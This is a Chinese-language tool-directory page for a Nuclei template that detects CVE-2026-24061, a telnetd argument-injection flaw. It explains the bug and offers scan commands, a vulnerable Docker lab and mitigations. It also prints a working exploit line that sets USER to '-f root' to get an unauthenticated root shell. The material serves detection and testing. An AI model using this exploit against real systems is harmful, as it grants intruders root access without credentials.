Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061 — Nuclei 模板,用于检测 CVE-2026-24061,这是 GNU inetutils telnetd 中的一个严重 telnet 参数注入漏洞,允许未经身份验证的 root 访问。 | Kitploit
工具/GitHubGitHub/mr-zapi/cve-2026-24061
漏洞扫描器漏洞利用Web应用程序漏洞利用网络安全渗透测试学习与教育
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

Nuclei 模板,用于检测 CVE-2026-24061,这是 GNU inetutils telnetd 中的一个严重 telnet 参数注入漏洞,允许未经身份验证的 root 访问。

查看仓库
17个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 - Telnet 参数注入

用于检测 GNU inetutils telnetd 中 CVE-2026-24061 漏洞的 Nuclei 模板,该漏洞允许在无需认证的情况下获取 root 访问权限。

📋 漏洞描述

CVE-2026-24061 是 GNU inetutils telnetd 中的一个严重 参数注入 漏洞,允许攻击者在不知道密码的情况下获取 root shell。

它是如何工作的?

  1. 问题根源:2015 年,telnetd 中添加了一个带有动态参数 %U 的新登录模板:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. 漏洞:环境变量 USER 通过 telnet 协议(RFC 1572 NEW-ENVIRON)传递,并且在替换到命令中之前 未经过净化处理。

  2. 利用方式:攻击者在连接时设置 USER="-f root":

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. 结果:登录命令变为:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

-f 标志表示 "跳过认证" → 无需密码即可获得 root 💀

🎯 受影响的版本

  • 使用存在漏洞的登录模板的 GNU inetutils telnetd
  • 例如:inetutils-telnetd 2:2.0-1+deb11u2
  • 使用无 Kerberos 自动登录的 telnetd 系统

🚀 使用方法

基础扫描

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

多个目标

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 测试实验室

为了进行测试,可以启动一个存在漏洞的 Docker 容器:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

启动方式:

root@kitploit:~
# 构建镜像
docker build -t vuln-telnetd .

# 运行
docker run -d -p 2323:23 vuln-telnetd

# 检查漏洞
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ 防护措施

  1. 更新 inetutils 到已修复的版本
  2. 禁用 telnetd 并使用 SSH
  3. 在防火墙中过滤 23 端口
  4. 监控 telnet 连接

📚 参考链接

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 CVSS 评分

9.8 / 10 - 严重

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - 网络(通过网络攻击)
  • AC:L - 低复杂度(易于利用)
  • PR:N - 无需权限(不需要认证)
  • UI:N - 无需用户交互(自动利用)
  • C:H/I:H/A:H - 对机密性、完整性和可用性造成高影响

⚠️ 免责声明

此工具 仅用于 对您拥有明确授权的系统进行合法的安全测试。

作者不对该模板的非法使用承担任何责任。

👤 作者

Created by Mr.Zapi

下载工具